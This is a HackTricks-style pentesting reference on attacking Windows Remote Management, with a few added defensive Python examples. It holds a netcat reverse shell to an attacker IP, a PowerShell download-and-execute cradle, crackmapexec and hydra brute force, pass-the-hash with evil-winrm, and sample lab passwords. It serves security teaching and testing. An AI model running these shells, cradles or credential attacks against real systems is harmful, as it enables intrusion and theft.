5985,5986 - Pentesting WinRM
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:
- If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @carlospolopm.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Join HackenProof Discord server to communicate with experienced hackers and bug bounty hunters!
Hacking Insights
Engage with content that delves into the thrill and challenges of hacking
Real-Time Hack News
Keep up-to-date with fast-paced hacking world through real-time news and insights
Latest Announcements
Stay informed with the newest bug bounties launching and crucial platform updates
Join us on Discord and start collaborating with top hackers today!
WinRM
Windows Remote Management (WinRM) is a Microsoft protocol for managing Windows systems remotely over HTTP(S), using SOAP as its message format. Under the hood it relies on WMI, so it can be thought of as an HTTP-based interface to WMI operations.
When WinRM is enabled on a machine, it provides straightforward remote administration via PowerShell, much as SSH does on other operating systems. To determine whether WinRM is running, check whether these ports are open:
- 5985/tcp (HTTP)
- 5986/tcp (HTTPS)
An open port from the list above signifies that WinRM has been set up, thus permitting attempts to initiate a remote session.
Initiating a WinRM Session
To configure PowerShell for WinRM, Microsoft's Enable-PSRemoting cmdlet comes into play, setting up the computer to accept remote PowerShell commands. With elevated PowerShell access, the following commands can be executed to enable this functionality and designate any host as trusted:
Enable-PSRemoting -Force
Set-Item wsman:\localhost\client\trustedhosts *
Note that the wildcard (*) written to trustedhosts above makes the client trust every host, so it should be used with care.
WinRM can also be enabled remotely with wmic:
wmic /node:<REMOTE_HOST> process call create "powershell enable-psremoting -force"
Test if configured
From your attack machine, the Test-WSMan command is used to check whether the target has WinRM configured properly. If it does, the command returns details including the protocol version and wsmid. Below are examples of the expected output for a configured target versus an unconfigured one:
- For a target that is properly configured, the output will look similar to this:
{
"ProtocolVersion": "http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd",
"ProductVendor": "Microsoft Corporation",
"ProductVersion": "OS: 0.0.0 SP: 0.0 Stack: 3.0",
"ProductFamily": "Windows",
"Architecture": "x64",
"OSLanguage": "en-US",
"Locale": "en-US",
"BuildVersion": "10.0.17763.1",
"PSVersion": "5.1.17763.1007",
"SerializationVersion": "1.1.0.1",
"WSManStackVersion": "3.0",
"Wsmid": "http://schemas.dmtf.org/wbem/wsman/identity/1/wsmanidentity.xsd",
"SupportedTransferProtocols": ["http", "https"],
"DefaultPorts": {"HTTP": 5985, "HTTPS": 5986},
"CapabilityURI": ["http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd"],
"SupportedLocale": ["en-US"],
"SupportedDataLocale": ["en-US"],
"SupportedEncoding": ["UTF-8", "UTF-16LE", "UTF-16BE", "UTF-32LE", "UTF-32BE", "ISO-8859-1", "US-ASCII"],
"SupportedCompression": ["GZIP", "NONE"],
"SupportedProfiles": ["http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd"],
"SupportedOperations": ["Enumerate", "Get", "Pull", "Put", "Create", "Delete", "Invoke"],
"SupportedFormats": ["xml", "json"],
"SupportedSchemas": ["http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd"]
}
- For a target that is not properly configured, the output will look similar to this:
Test-WSMan : <f:WSManFault xmlns:f="http://schemas.microsoft.com/wbem/wsman/1/wsmanfault" Code="2150858770" Machine="target_machine_name"><f:Message><f:ProviderFault provider="Config provider" path="%systemroot%\system32\WsmSvc.dll"><f:WSManFault xmlns:f="http://schemas.microsoft.com/wbem/wsman/1/wsmanfault" Code="2150858770" Machine="target_machine_name"><f:Message>WinRM cannot complete the operation. Verify that the specified computer name is valid, that the computer is accessible over the network, and that a firewall exception for the WinRM service is enabled and allows access from this computer. By default, the WinRM firewall exception for public profiles limits access to remote computers within the same local subnet. For more information, see the about_Remote_Troubleshooting Help topic.</f:Message></f:WSManFault></f:Message></f:WSManFault>
At line:1 char:1
+ Test-WSMan -ComputerName target_machine_name
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (target_machine_name:String) [Test-WSMan], InvalidOperationException
+ FullyQualifiedErrorId : WsManError,Microsoft.WSMan.Management.TestWSManCommand
Enable WinRM
To enable WinRM on a target machine, run the Enable-PSRemoting command shown above; it configures the settings needed for remote management via WinRM and prints a confirmation once WinRM has been enabled. Afterwards, confirm from your own machine that the target answers:
Test-WSMan <target-ip>
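What Test-WSMan actually does on the wire is a WS-Management Identify request: an unauthenticated SOAP POST to the /wsman endpoint. The following is an added example (not code from the original page or from Microsoft) that builds that request, parses the reply the way the text above describes (protocol version plus vendor/product strings), and includes a probe() helper for a live host; SAMPLE_RESPONSE and SAMPLE_FAULT are constructed replies shaped like real ones.

```python
"""WS-Management Identify: what Test-WSMan sends and how to read the answer.

Added example, not from the original page. Test-WSMan issues an unauthenticated
SOAP POST of <wsmid:Identify/> to /wsman with the header
'WSMANIDENTIFY: unauthenticated'; a configured WinRM service answers with
ProtocolVersion, ProductVendor and ProductVersion. An unauthenticated Identify
deliberately hides the OS build ('OS: 0.0.0 SP: 0.0 Stack: 3.0'), so this is a
configuration check, not a fingerprint of the patch level.
"""
from __future__ import annotations

import urllib.request
import xml.etree.ElementTree as ET

SOAP_NS = "http://www.w3.org/2003/05/soap-envelope"
WSMID_NS = "http://schemas.dmtf.org/wbem/wsman/identity/1/wsmanidentity.xsd"


def identify_request() -> tuple[dict[str, str], bytes]:
    """Headers and body of the Identify request Test-WSMan sends."""
    headers = {
        "Content-Type": "application/soap+xml;charset=UTF-8",
        # Without this header WinRM demands authentication (HTTP 401).
        "WSMANIDENTIFY": "unauthenticated",
    }
    body = (
        f'<s:Envelope xmlns:s="{SOAP_NS}" xmlns:wsmid="{WSMID_NS}">'
        "<s:Header/><s:Body><wsmid:Identify/></s:Body></s:Envelope>"
    ).encode("utf-8")
    return headers, body


def parse_identify_response(xml_bytes: bytes) -> dict[str, str]:
    """Flatten the IdentifyResponse children into {tag: text}; ValueError on a fault."""
    root = ET.fromstring(xml_bytes)
    resp = root.find(f".//{{{WSMID_NS}}}IdentifyResponse")
    if resp is None:
        raise ValueError("not a WS-Management IdentifyResponse")
    return {child.tag.split("}", 1)[1]: (child.text or "").strip() for child in resp}


def winrm_configured(info: dict[str, str]) -> bool:
    """The check the text describes: a protocol version plus a Microsoft vendor string."""
    return bool(info.get("ProtocolVersion")) and "Microsoft" in info.get("ProductVendor", "")


def probe(host: str, port: int | None = None, https: bool = False, timeout: float = 5.0) -> dict[str, str]:
    """Send the Identify request to a live host (network; not exercised offline)."""
    scheme = "https" if https else "http"
    port = port or (5986 if https else 5985)
    headers, body = identify_request()
    req = urllib.request.Request(f"{scheme}://{host}:{port}/wsman", data=body, headers=headers, method="POST")
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return parse_identify_response(resp.read())


# Constructed sample of a successful reply (shape of a real Windows answer).
SAMPLE_RESPONSE = b"""<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope"
    xmlns:wsmid="http://schemas.dmtf.org/wbem/wsman/identity/1/wsmanidentity.xsd">
  <s:Header/>
  <s:Body>
    <wsmid:IdentifyResponse>
      <wsmid:ProtocolVersion>http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd</wsmid:ProtocolVersion>
      <wsmid:ProductVendor>Microsoft Corporation</wsmid:ProductVendor>
      <wsmid:ProductVersion>OS: 0.0.0 SP: 0.0 Stack: 3.0</wsmid:ProductVersion>
    </wsmid:IdentifyResponse>
  </s:Body>
</s:Envelope>"""

# Constructed sample of a SOAP fault, i.e. the "not configured" case.
SAMPLE_FAULT = b"""<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope">
  <s:Body><s:Fault><s:Code><s:Value>s:Receiver</s:Value></s:Code></s:Fault></s:Body>
</s:Envelope>"""

if __name__ == "__main__":
    info = parse_identify_response(SAMPLE_RESPONSE)
    print(info, "configured" if winrm_configured(info) else "not configured")
```

The same request is useful on the defensive side: sending it to your own address ranges tells you which hosts expose WinRM at all, without needing credentials.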
Execute a command
To execute ipconfig remotely on a target machine and view its output, do the following:
Invoke-Command -computername computer-name.domain.tld -ScriptBlock {ipconfig /all} [-credential DOMAIN\username]
If a function (here called enumeration) is defined in your current local PS console and you want to run it on the remote computer, you can do:
Invoke-Command -ComputerName <computername> -ScriptBLock ${function:enumeration} [-ArgumentList "arguments"]
Execute a Script
To run a script on a host exposing WinRM, use the Invoke-Command cmdlet in PowerShell, which executes commands or scripts on remote systems. The basic form is:
Invoke-Command -ComputerName <target> -ScriptBlock { <script> }
Replace <target> with the IP address or hostname of the target system and <script> with the script you want to execute. WinRM must be enabled on the target and you need the permissions to execute scripts remotely; WinRM settings and firewall rules may need adjusting to allow the connection.
Remember to use this technique responsibly and only on systems that you have proper authorization to access.
To run a local script file on the remote host:
Invoke-Command -ComputerName <computername> -FilePath C:\path\to\script\file [-credential CSCOU\jarrieta]
Get reverse-shell
Description
A reverse shell is a technique used in hacking to gain remote access to a target system. It involves establishing a connection from the target system to the attacker's machine, allowing the attacker to execute commands on the target system.
Steps
- Identify a vulnerable service or application on the target system that can be exploited to gain remote access.
- Determine the IP address and port number of the attacker's machine.
- Use a payload or exploit to establish a reverse shell connection from the target system to the attacker's machine.
- Once the connection is established, the attacker can execute commands on the target system as if they were physically present.
- Take precautions to avoid detection, such as using encrypted connections or disguising the traffic.
Example
Here is an example of using the nc
command to create a reverse shell connection:
attacker$ nc -lvp <port>
target$ nc <attacker_ip> <attacker_port> -e /bin/bash
In this example, the attacker listens for incoming connections on the specified port, while the target system connects back to the attacker's machine and opens a shell session.
Mitigation
To prevent reverse shell attacks, it is important to:
- Regularly update and patch software to fix vulnerabilities.
- Implement strong access controls and authentication mechanisms.
- Monitor network traffic for suspicious activity.
- Use intrusion detection and prevention systems.
- Employ network segmentation to limit the impact of a successful attack.
Over WinRM, a reverse shell is obtained by having the remote host download and run a PowerShell script:
Invoke-Command -ComputerName <computername> -ScriptBlock {cmd /c "powershell -ep bypass iex (New-Object Net.WebClient).DownloadString('http://10.10.10.10:8080/ipst.ps1')"}
Get a PS session
To get an interactive PowerShell shell use Enter-PSSession:
#If you need to use different creds
$password=ConvertTo-SecureString 'Stud41Password@123' -Asplaintext -force
## Note the ".\" in the username to indicate it's a local user (host domain)
$creds=New-Object System.Management.Automation.PSCredential(".\student41", $password)
# Enter
Enter-PSSession -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local [-Credential username]
## Bypass proxy
Enter-PSSession -ComputerName 1.1.1.1 -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)
# Save session in var
$sess = New-PSSession -ComputerName 1.1.1.1 -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)
Enter-PSSession $sess
## Background current PS session
Exit-PSSession # This will leave it in background if it's inside an env var (New-PSSession...)
Inside the victim, the process wsmprovhost should be running: it is the host process in which the remote PowerShell session executes.
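Because every command sent through Enter-PSSession or Invoke-Command runs inside wsmprovhost.exe on the target, the parent process is the cleanest detection handle for WinRM activity. The following is an added example (not from the original page or any vendor) that triages process-creation events on that basis, scoring the patterns this page shows (shell child, -ep bypass, iex download cradle, wmic enabling PS remoting) above routine admin use; SAMPLE_EVENTS are constructed Sysmon Event ID 1-style records with made-up hosts, users and paths.

```python
"""Triage process-creation events for code executed through WinRM.

Added example, not from the original page. Commands sent with Invoke-Command
or Enter-PSSession run inside wsmprovhost.exe on the target, so any process
whose parent is wsmprovhost.exe was started over WinRM. Routine use (an admin
running ipconfig) stays at a low score; the score rises for a shell child, an
execution-policy bypass, a download cradle with iex, a LOLBin, or remote
enablement of PS remoting. SAMPLE_EVENTS are constructed, not real telemetry.
"""
from __future__ import annotations

import ntpath
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    host: str
    user: str
    image: str          # full path of the new process
    parent_image: str   # full path of the parent process
    command_line: str


WINRM_HOST = "wsmprovhost.exe"
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
LOLBINS = {"wmic.exe", "rundll32.exe", "certutil.exe", "mshta.exe", "regsvr32.exe"}
DOWNLOAD_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest", "net.webclient")


def basename(path: str) -> str:
    return ntpath.basename(path).lower()


def score_event(e: ProcessEvent) -> tuple[int, list[str]]:
    """Return (score, reasons); 0 for anything not started by wsmprovhost.exe."""
    if basename(e.parent_image) != WINRM_HOST:
        return 0, []
    child = basename(e.image)
    cl = e.command_line.lower()
    score, reasons = 1, [f"{child} spawned by {WINRM_HOST} (WinRM session)"]
    if child in SHELLS:
        score += 1
        reasons.append("shell started over WinRM")
    if child in LOLBINS:
        score += 2
        reasons.append(f"living-off-the-land binary {child}")
    if "-ep bypass" in cl or "executionpolicy bypass" in cl:
        score += 2
        reasons.append("execution policy bypass")
    if re.search(r"\b(iex|invoke-expression)\b", cl):
        score += 1
        reasons.append("invoke-expression of dynamic content")
    if any(m in cl for m in DOWNLOAD_MARKERS):
        score += 2
        reasons.append("download cradle in command line")
    if "enable-psremoting" in cl:
        score += 1
        reasons.append("remote enablement of PS remoting")
    return score, reasons


def triage(events: list[ProcessEvent], threshold: int = 3) -> list[dict]:
    """Events at or above the threshold, highest score first (ties keep event order)."""
    hits = []
    for e in events:
        score, reasons = score_event(e)
        if score >= threshold:
            hits.append({"host": e.host, "user": e.user, "image": basename(e.image),
                         "score": score, "reasons": reasons})
    return sorted(hits, key=lambda h: -h["score"])


WSMPROVHOST = r"C:\Windows\System32\wsmprovhost.exe"
SAMPLE_EVENTS = [
    # 1: the download-and-execute one-liner from the page, run through cmd
    ProcessEvent("WS01", r"CORP\jarrieta", r"C:\Windows\System32\cmd.exe", WSMPROVHOST,
                 'cmd /c "powershell -ep bypass iex (New-Object Net.WebClient).DownloadString(\'http://10.10.10.10:8080/ipst.ps1\')"'),
    # 2: routine admin use over WinRM: a single diagnostic command
    ProcessEvent("WS01", r"CORP\svc_mon", r"C:\Windows\System32\ipconfig.exe", WSMPROVHOST, "ipconfig /all"),
    # 3: same bypass but launched from Explorer, i.e. not over WinRM
    ProcessEvent("WS02", r"CORP\alice", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Windows\explorer.exe", r"powershell -ep bypass -File C:\Users\alice\build.ps1"),
    # 4: a script run over WinRM with the execution policy bypassed
    ProcessEvent("SRV01", r"CORP\admin", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", WSMPROVHOST,
                 r"powershell -ep bypass -File C:\scripts\inventory.ps1"),
    # 5: WinRM being switched on elsewhere via wmic, from an existing WinRM session
    ProcessEvent("DC01", r"CORP\admin", r"C:\Windows\System32\wbem\WMIC.exe", WSMPROVHOST,
                 'wmic /node:SRV02 process call create "powershell enable-psremoting -force"'),
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit)
```

The threshold is deliberately above the base score of 1, so ordinary WinRM administration is recorded but not alerted on; tune the weights to what your own admins actually run.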
Force Open WinRM
If you want to use PS Remoting and WinRM but the computer isn't configured for it, you can enable it with:
.\PsExec.exe \\computername -u domain\username -p password -h -d powershell.exe "enable-psremoting -force"
Saving and Restoring sessions
This won't work if the language mode is constrained on the remote computer.
#If you need to use different creds
$password=ConvertTo-SecureString 'Stud41Password@123' -Asplaintext -force
## Note the ".\" in the username to indicate it's a local user (host domain)
$creds2=New-Object System.Management.Automation.PSCredential(".\student41", $password)
#You can save a session inside a variable
$sess1 = New-PSSession -ComputerName <computername> [-SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)]
#And restore it at any moment doing
Enter-PSSession -Session $sess1
Inside these sessions you can load PS scripts using Invoke-Command:
Invoke-Command -FilePath C:\Path\to\script.ps1 -Session $sess1
Errors
If you find the following error:
enter-pssession : Connecting to remote server 10.10.10.175 failed with the following error message : The WinRM client cannot process the request. If the authentication scheme is different from Kerberos, or if the client computer is not joined to a domain, then HTTPS transport must be used or the destination machine must be added to the TrustedHosts configuration setting. Use winrm.cmd to configure TrustedHosts. Note that computers in the TrustedHosts list might not be authenticated. You can get more information about that by running the following command: winrm help config. For more information, see the about_Remote_Troubleshooting Help topic.
Then try on the client (info from here):
winrm quickconfig
winrm set winrm/config/client '@{TrustedHosts="Computer1,Computer2"}'
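TrustedHosts appears twice on this page (the wildcard written with Set-Item earlier and the winrm set command just above), and the error text explains why it matters: hosts on that list are connected to with NTLM even though the client cannot authenticate them, so the client will hand its credentials to whatever answers at that name. The following is an added example (not from the original page or from Microsoft) that extracts the value from winrm get output, answers whether a given target would be trusted, and grades how broad the list is; SAMPLE_WINRM_GET is a constructed excerpt and its exact layout is an assumption.

```python
"""Audit a WinRM client's TrustedHosts setting.

Added example, not from the original page. TrustedHosts is the comma-separated
list of servers the *client* will connect to with NTLM when Kerberos is not
available; an entry means the client will send credentials to that host without
being able to verify its identity, so the broader the list, the larger the blast
radius of a spoofed or compromised host. Entries are names, IP addresses or
wildcard patterns such as '*.corp.local' ('*' alone trusts everything); this
helper treats them as case-insensitive glob patterns. SAMPLE_WINRM_GET is a
constructed excerpt of 'winrm get winrm/config/client' output (layout assumed).
"""
from __future__ import annotations

import fnmatch
import re


def parse_trusted_hosts(value: str) -> list[str]:
    """Split the raw TrustedHosts string into its entries."""
    return [e.strip() for e in value.split(",") if e.strip()]


def trusted_hosts_from_winrm_get(text: str) -> str:
    """Pull the TrustedHosts value out of 'winrm get winrm/config/client' output."""
    m = re.search(r"^\s*TrustedHosts\s*=\s*(.*?)\s*$", text, re.MULTILINE)
    return m.group(1) if m else ""


def is_trusted(target: str, trusted_hosts: str) -> bool:
    """Would the client accept a non-Kerberos connection to `target` under this list?"""
    t = target.strip().lower()
    return any(fnmatch.fnmatchcase(t, e.lower()) for e in parse_trusted_hosts(trusted_hosts))


def assess(trusted_hosts: str) -> tuple[str, list[str]]:
    """Grade the list: 'none', 'low', 'medium' (suffix wildcards) or 'high' ('*')."""
    entries = parse_trusted_hosts(trusted_hosts)
    findings: list[str] = []
    if not entries:
        return "none", ["TrustedHosts is empty: non-Kerberos targets need HTTPS"]
    level = "low"
    for e in entries:
        if e == "*":
            level = "high"
            findings.append("'*' trusts every host: credentials may be sent to any machine answering on 5985/5986")
        elif "*" in e:
            if level != "high":
                level = "medium"
            findings.append(f"wildcard entry {e!r} trusts a whole name range")
    return level, findings


SAMPLE_WINRM_GET = """Client
    NetworkDelayms = 5000
    URLPrefix = wsman
    AllowUnencrypted = false
    Auth
        Basic = true
        Kerberos = true
        Negotiate = true
        Certificate = true
        CredSSP = false
    DefaultPorts
        HTTP = 5985
        HTTPS = 5986
    TrustedHosts = Computer1,Computer2,*.corp.local
"""

if __name__ == "__main__":
    th = trusted_hosts_from_winrm_get(SAMPLE_WINRM_GET)
    print(th, assess(th), is_trusted("dc01.corp.local", th))
```

The practical takeaway matches the error message: prefer Kerberos (domain-joined, use the hostname) or HTTPS with a verifiable certificate, and keep TrustedHosts to the few explicit names that genuinely need NTLM.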
WinRM connection in linux
Brute Force
Be careful: brute-forcing WinRM could lock users out.
#Brute force
crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
#Just check a pair of credentials
# Username + Password + CMD command execution
crackmapexec winrm <IP> -d <Domain Name> -u <username> -p <password> -x "whoami"
# Username + Hash + PS command execution
crackmapexec winrm <IP> -d <Domain Name> -u <username> -H <HASH> -X '$PSVersionTable'
#Crackmapexec won't give you an interactive shell, but it will check if the creds are valid to access winrm
Using evil-winrm
evil-winrm is a Ruby tool for remote command execution on Windows hosts over WinRM. It gives you an interactive PowerShell-like shell plus file upload/download and in-memory loading of scripts and binaries. Install it with:
gem install evil-winrm
Read the documentation: https://github.com/Hackplayers/evil-winrm
Basic usage, connecting with a username and password:
evil-winrm -i <target_ip> -u <username> -p <password>
Besides password and hash authentication, certificate-based authentication is supported; the certificate file is passed with the -c option (see the documentation for the matching key and SSL options):
evil-winrm -i <target_ip> -u <username> -p <password> -c <certificate_file>
Once connected you get a prompt on the target and simply type the commands you want to run, for example:
C:\> whoami
Files are transferred from inside the session with the upload <local_path> <remote_path> and download <remote_path> <local_path> commands. Alternatively, start evil-winrm with -s <local_dir> (PowerShell scripts) or -e <local_dir> (binaries) so the contents of those directories can be loaded in memory on the target; type menu inside the session to list the available helpers.
Example invocation:
evil-winrm -u Administrator -p 'EverybodyWantsToWorkAtP.O.O.' -i <IP>/<Domain>
To use evil-winrm to connect to an IPv6 address create an entry inside /etc/hosts setting a domain name to the IPv6 address and connect to that domain.
Pass the hash with evil-winrm
evil-winrm -u <username> -H <Hash> -i <IP>
Using a PS docker machine
docker run -it quickbreach/powershell-ntlm
$creds = Get-Credential
Enter-PSSession -ComputerName 10.10.10.149 -Authentication Negotiate -Credential $creds
Using a ruby script
Code extracted from here: https://alamot.github.io/winrm_shell/
require 'winrm-fs'
# Author: Alamot
# To upload a file type: UPLOAD local_path remote_path
# e.g.: PS> UPLOAD myfile.txt C:\temp\myfile.txt
# https://alamot.github.io/winrm_shell/
conn = WinRM::Connection.new(
  endpoint: 'https://IP:PORT/wsman',
  transport: :ssl,
  user: 'username',
  password: 'password',
  no_ssl_peer_verification: true
)

class String
  # Split a command line on whitespace, keeping quoted arguments together,
  # then strip surrounding spaces and quotes from each token.
  def tokenize
    self.
      split(/\s(?=(?:[^'"]|'[^']*'|"[^"]*")*$)/).
      select { |s| not s.empty? }.
      map { |s| s.gsub(/(^ +)|( +$)|(^["']+)|(["']+$)/, '') }
  end
end

command = ""
file_manager = WinRM::FS::FileManager.new(conn)
conn.shell(:powershell) do |shell|
  until command == "exit\n" do
    # Build the prompt on the remote side: "PS user@host dir> "
    output = shell.run("-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')")
    print(output.output.chomp)
    command = gets || "exit\n"   # EOF on stdin ends the session cleanly
    if command.start_with?('UPLOAD') then
      upload_command = command.tokenize
      print("Uploading " + upload_command[1] + " to " + upload_command[2])
      file_manager.upload(upload_command[1], upload_command[2]) do |bytes_copied, total_bytes, local_path, remote_path|
        puts("#{bytes_copied} bytes of #{total_bytes} bytes copied")
      end
      command = "echo `nOK`n"
    end
    output = shell.run(command) do |stdout, stderr|
      STDOUT.print(stdout)
      STDERR.print(stderr)
    end
  end
  puts("Exiting with code #{output.exitcode}")
end
Shodan
port:5985 Microsoft-HTTPAPI
HackTricks Automatic Commands
Protocol_Name: WinRM #Protocol Abbreviation if there is one.
Port_Number: 5985 #Comma separated if there is more than one.
Protocol_Description: Windows Remote Management #Protocol Abbreviation Spelled out
Entry_1:
Name: Notes
Description: Notes for WinRM
Note: |
Windows Remote Management (WinRM) is a Microsoft protocol that allows remote management of Windows machines over HTTP(S) using SOAP. On the backend it's utilising WMI, so you can think of it as an HTTP based API for WMI.
sudo gem install winrm winrm-fs colorize stringio
git clone https://github.com/Hackplayers/evil-winrm.git
cd evil-winrm
ruby evil-winrm.rb -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!'
https://kalilinuxtutorials.com/evil-winrm-hacking-pentesting/
ruby evil-winrm.rb -i 10.10.10.169 -u melanie -p 'Welcome123!' -e /root/Desktop/Machines/HTB/Resolute/
^^ so you can load binaries from that directory, or use -s to load scripts (e.g. Sherlock)
menu
invoke-binary `tab`
#python3
import winrm
s = winrm.Session('windows-host.example.com', auth=('john.smith', 'secret'))
print(s.run_cmd('ipconfig'))
print(s.run_ps('ipconfig'))
https://book.hacktricks.xyz/pentesting/pentesting-winrm
Entry_2:
Name: Hydra Brute Force
Description: Need User
Command: hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} rdp://{IP}